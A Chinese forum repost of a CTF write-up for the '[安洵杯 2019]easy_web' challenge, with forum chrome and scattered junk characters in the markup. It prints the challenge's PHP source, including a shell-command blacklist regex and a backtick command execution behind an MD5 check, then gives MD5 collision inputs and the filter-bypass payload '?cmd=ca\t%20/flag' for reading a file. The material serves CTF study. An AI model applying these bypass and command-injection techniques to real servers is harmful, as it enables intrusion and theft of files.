设为首页收藏本站
切换到宽版

飞雪团队

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
飞雪团队»论坛首页 编程资源 程序人生 [安洵杯 2019]easy_web
返回列表 发新帖
查看: 14408|回复: 0

[安洵杯 2019]easy_web

[复制链接]
admin

8058

主题

8146

帖子

2万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
26504
发表于 2022-2-12 14:35:42 | 显示全部楼层 |阅读模式

本站资源如失效,请点击反馈!

1 N* O5 j3 s/ b2 a
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>6 T/ i; j% ?1 t* X
<p>&nbsp;</p>
/ |# y" I6 r9 P  @% |<p>&nbsp;</p>
( x* Q5 H  a* [<p>&nbsp;题目打开如下,?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=,同时查看源代码</p>
& P# Q0 l; N( ^0 Q; w" u5 l2 y<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>/ O! G* y  _/ j$ B
<p>&nbsp;</p>' Y/ \1 B: x6 @% }+ k7 h
<p>&nbsp;</p>5 p7 P6 _4 M$ W* i  S
<p>这里有个MD5 is funny,说明这个题目大概率跟MD5有关</p>2 [4 c9 k# m5 U: {
<p>然后我抓包了一下,消息头里面没有什么特殊的东西,于是我尝试从url入手</p>
4 ~0 X: q% `& l  B: ^+ m<p>首先把那个进行一次base64位解码</p>0 X" e  d  M# ?' u
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>; C. |3 d1 h5 h5 X# r- _) H6 F/ S" W
<p>&nbsp;</p>
" O) q* e9 q" c6 r<p>&nbsp;</p>9 V% m& m9 b: c, e8 i" m- b& P5 s3 ]
<p>&nbsp;解码一次以后还是很像base64编码,于是又解码一次</p>5 v! q9 u- m5 c1 M( J& G
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>1 b1 v9 f$ y  {; U- O! e; K9 f
<p>&nbsp;</p>
9 D' c9 ~8 F8 |<p>&nbsp;</p>
; I  G+ b2 k; \3 Y<p>&nbsp;然后用hex解码一下得到了</p>2 n- ]1 z7 x6 [! v/ m) c, X
<div class="cnblogs_Highlighter">
) y/ `5 _+ o& T& \4 q5 H9 `! z9 F<pre class="brush:sql;gutter:true;">555.png9 U  Z! U9 s' w5 a
</pre>
" p% C3 Y" U+ ]</div>! ]$ C* H+ f, C3 L" g% S: U
<p>  用同样的方法把index.php进行加密</p>
; p) \: |; K" d. ?  u<div class="cnblogs_Highlighter">
2 O8 R! ^5 T( e6 I4 k6 T<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3; _9 V) v0 q) ~% I. b1 ^7 d
</pre>- |0 ~, U& A: e. @" c$ W
</div>
( M! F1 }; q9 |* |<p>  然后输入到地址栏</p>- k6 ^3 e9 I9 S. m- Y0 m# ~
<p>&nbsp;然后查看源代码,把源代码里面的那一串base64的编码解码</p>/ s, J) G8 l# k; B" k
<div class="cnblogs_code">* W0 W' Q6 q! |, j, }) ^
<pre>&lt;?<span style="color: rgba(0, 0, 0, 1)">php
& Y8 t/ ~- `# U* f* X</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);$ k( B: |8 Y8 \9 H+ q
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
5 g% w! p- D8 e0 \: Q3 P3 C</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];* {; h9 `! d7 J2 C; t
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">]))
- l2 U2 Y. t' Y( o' |" Q8 K# F- Z    </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd='<span style="color: rgba(0, 0, 0, 1)">);- o! t" e5 f& V8 M& a
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));/ y2 j6 ^% v& M6 r7 k

2 N; z0 v$ {8 s4 z0 ~+ P" n</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);* p7 y! Q! |. S& v7 L7 w7 @) s
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
3 _1 `: D  `9 y( m3 e2 F; T4 F! }    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '&lt;img src ="./ctf3.jpeg"&gt;'<span style="color: rgba(0, 0, 0, 1)">;8 q6 F0 t. K! f# [: ^" P  A1 r
    </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi~ no flag"<span style="color: rgba(0, 0, 0, 1)">);) N( |$ v8 u  s. X& R
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {  `! V6 I* i! D2 J: u* q
    </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));
8 z6 e. j% {+ y4 _4 Q2 C& U    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'&gt;&lt;/img&gt;"<span style="color: rgba(0, 0, 0, 1)">;5 F' \  t" V( A  k
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
5 u0 P- T1 K/ B0 B% X- k  s2 y$ R2 z}! ?2 }+ i) U; O9 r" v
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;' S# \1 D, R4 ~% ?) y* a3 W
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;1 N. a  j9 z4 e' a* [* Z' }
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {, Q" g: j9 Y" d
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);9 N8 D5 B3 \% a! v
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;& A+ z9 _! I% [$ T% J+ f
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {1 {* d$ a8 A, P4 y0 E( I
    </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
! h) F) O- A5 `3 K        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;. C* E2 Z! U! l7 [5 q9 Q/ a1 P
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {  i8 ^; ?: {3 C
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);; P) B) x5 l; _+ r2 x/ ~1 F
    }1 ^# n: s* G& ^/ l9 O6 X& l+ i
}
0 Z" b7 r* a+ e6 P1 X" n% A/ D. n8 k: }
</span>?&gt;0 P: F# j3 k, R5 v1 B0 ]- F' W+ x3 y
&lt;html&gt;2 ]8 N: y* z; S% T. n( s5 S3 g, g
&lt;style&gt;<span style="color: rgba(0, 0, 0, 1)">
: \1 q1 T; z7 @3 ^$ a  body{( v8 \1 R1 _8 ~) _1 \
   background</span>:url(./bj.png)  no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;+ |5 v+ r/ s! o/ L% f, `
   background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;* X! \9 ^" s" ?, x6 C. g
   background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;  N; M+ l( }5 v! R$ u% X, x" B
   background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
6 h+ ^  r, D( S6 _<span style="color: rgba(0, 0, 0, 1)">}. A) W$ h1 n! M- A
</span>&lt;/style&gt;
# m; ?, F* M! f5 z&lt;body&gt;
  ~* j( V3 y6 d! O&lt;/body&gt;
+ w: E( Q5 S  l' K3 I  |&lt;/html&gt;</pre>
" U% V1 j% S' ~0 v& E0 k</div>
- ]4 R  V+ U; }% {1 m<p>结合前面的推断,关键代码就在</p>
% L5 W$ E2 N3 O<div class="cnblogs_code">; J& G" B* u2 @" R
<pre>    <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
5 u/ m# f6 w/ K6 n        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
2 \& i4 y. t4 o" r4 `5 P6 z    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
& ~/ ~. W8 w9 ^& o: V4 _        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
  {' _' j8 H. N7 X3 V2 R6 q    }</span></pre>
& g% H! g  U5 x; J3 a  U2 P; B</div>
: D' |4 [) C: ^1 I4 D3 f<p>这种MD5是md5强碰撞</p>9 s0 m1 D5 g+ m# B
<div class="cnblogs_Highlighter">
6 g' P9 a' r8 x; `6 q<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2/ e" K4 F; ^3 o; R2 n% N0 w$ p% u
</pre>
. Q5 u! L7 o3 t1 s2 q' K/ ?</div>
2 m/ s! F/ g- U7 g6 n, T' }<div class="cnblogs_Highlighter">
% a" o: t4 L% R<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2+ }' Q: l7 H% e2 o5 ?+ V2 n
</pre>3 _* ^7 B+ p! t2 J3 l2 R+ U
</div>
4 D1 h: f0 X  L% q, D  m; \0 C<p>  只需要这样就可以把cmd里面的当成命令来处理。</p>) G5 Q& e5 V# C+ o, {8 r& H
<p>于是采用payload:</p>8 P# z* w2 e7 I* P$ v9 K. s3 h3 ~
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
5 v" z* ~% L+ K# U4 ~1 a<p>&nbsp;</p>8 D  U  j" k# z1 w5 h8 G) v6 n
<p>&nbsp;因为'\'并没有被屏蔽所以可以这么绕过</p>
" l- H8 s7 O+ Z6 C<p>ls和l\s在命令执行的时候结果是一样的。</p>
2 {0 K7 |: j! q; ~6 Z4 `* x<p>然后发现根目录里面有/flag</p>
$ M0 [1 i3 h' h' @7 }  H<p>于是payload:</p>8 ?8 C2 c2 W8 @& {% E# z9 e# x
<div class="cnblogs_Highlighter">
5 h' A8 f8 g  a$ \' K8 K2 ^<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
. f9 G/ y% Y' V+ m</pre>
/ ]" `) w. i( N) E; `4 [</div>
+ O  u- [8 G8 M' W$ F9 D5 r<p>  对于这个题目,因为他没有屏蔽sort和dir</p># S# ^0 O$ o& k: Z: L- n. o
<p>所以查看也可以用dir来代替ls,cat可以用sort来代替。</p>
, E+ W0 q! ^# y5 S9 t' ?<p>&nbsp;</p>% ^8 _4 p6 I3 O7 f% w3 q+ \6 z2 x" r3 s
回复

使用道具 举报

返回列表 发新帖
懒得打字嘛,点击右侧快捷回复 【右侧内容,后台自定义】
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|飞雪团队

GMT+8, 2025-12-14 04:07 , Processed in 0.098557 second(s), 22 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表